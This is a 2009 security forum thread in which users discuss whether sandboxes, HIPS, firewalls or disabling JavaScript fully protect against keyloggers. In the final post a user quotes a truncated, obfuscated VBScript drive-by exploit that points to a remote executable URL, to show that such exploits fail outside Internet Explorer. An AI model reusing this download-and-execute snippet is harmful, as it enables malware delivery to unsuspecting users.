Is it possible to be protected against all Key-loggers?

Discussion in 'other anti-malware software' started by ssj100, May 28, 2009.

Thread Status:
Not open for further replies.
  1. ssj100

    ssj100 Guest

    http://www.sandboxie.com/index.php?DetectingKeyLoggers

    I found the above to be a very interesting read. My conclusion is that the only way to be 100% safe from key-loggers while browsing is to always browse in a clean sandbox each time (and also ensure that your other sandboxes are shut down).

    My question is whether there is any other method to have 100% protection against malicious key-loggers?

    On doing a search through Wilders forum, I see that with the test "Through the eyes of a key-logger", nothing passed it 100% (I am not counting black-listing programs of course). See here:
    https://www.wilderssecurity.com/showthread.php?t=235884&highlight=keylogger tests

    However, prevention (stopping the key-logger from even trying to start) is always the best method, and thus a well configured Sandboxie, most HIPS programs, and anti-executables would prevent these types of key-logger attacks.

But what about "Scripted Key-Loggers" and "Windows Message Key-Loggers" (http://www.sandboxie.com/index.php?DetectingKeyLoggers) that can record keystrokes within a running program (e.g. Firefox.exe)? I guess the question is whether these specific Key-loggers can use Firefox.exe or Opera.exe or Iexplore.exe etc. to leak information out without having to run a process (or run a process that will always be allowed by a HIPS etc.)? These are the ones where I think the only way to be 100% secure is to always use a clean sandbox when entering personal information that you don't want to be leaked. This means if you want to be 100% secure from key-loggers, you'll need to either delete the sandbox you're using and restart your browser in the deleted (clean) sandbox, or use a separate sandbox that you only use for private matters (like banking).

    Any comments or thoughts (particularly from Rmus and Kees etc) will be very welcome.
     
  2. jmonge

    jmonge Registered Member

    Joined:
    Mar 20, 2008
    Posts:
    12,883
    Location:
    Canada
For the last part, a strong, well-configured firewall will stop data leaks from any browser :)
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I'm not much help here since I have no experience in detection.

    Usually in reading articles as the one you cite, I get to something like,

    and I stop, because I never assume something I haven't authorized will install. That's why I find it more useful to look at actual exploits to see how they can be prevented from installing, rather than letting something run to see how it can be detected.

As for scripted keyloggers, well, that implies scripting is enabled for the site. Useful on Google if you like the pop-down menu of suggestions as you are typing your search. If concerned about an embedded scripted keylogger, turn off JavaScript.

    From what you describe, if a keylogger is present, the sandbox seems to be a pretty good solution in containing everything.

    As far as 100% protection - who can guarantee that about anything!

    Take deciding whether or not to download a new program. Maybe the user is worried that it has a keylogger built in. Either

    1) you trust your source of the download

    2) you trust a scanner

    Neither is 100% guaranteed, so you do whichever gives you the most peace of mind!

    regards,

    rich
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    True. It's a trade-off and directly dependent on what gives the user the best peace of mind!

    Also, risk assessment is helpful:

    • Are there active keylogging exploits where embedded script keyloggers have been found? A quick search did not turn up any.

    • What are the chances that your secure sites where you log in for transactions will have a script keylogger embedded in the code?

    Are you aware of web sites using VBScript? They will be cutting out any but IE users:

    http://www.opera.com/support/kb/view/415/
    http://www.webmasterworld.com/firefox_browser/3477161.htm
    This is why remote code execution exploits that use VBScript won't work in Opera/Firefox:

Code:
<html>
<script language="VBScript">
on error resume next
OOOOOOOOOOOOOwwwwwww ="http://bjgxt.cn/rtpp.exe"
Set eeeeeeeeeeeennnnnnnnnnn = document.createElement("obj"&"ect")
....

    Again, it seems your solution with a sandbox is ideal to cover all of your concerns.

    ----
    rich
     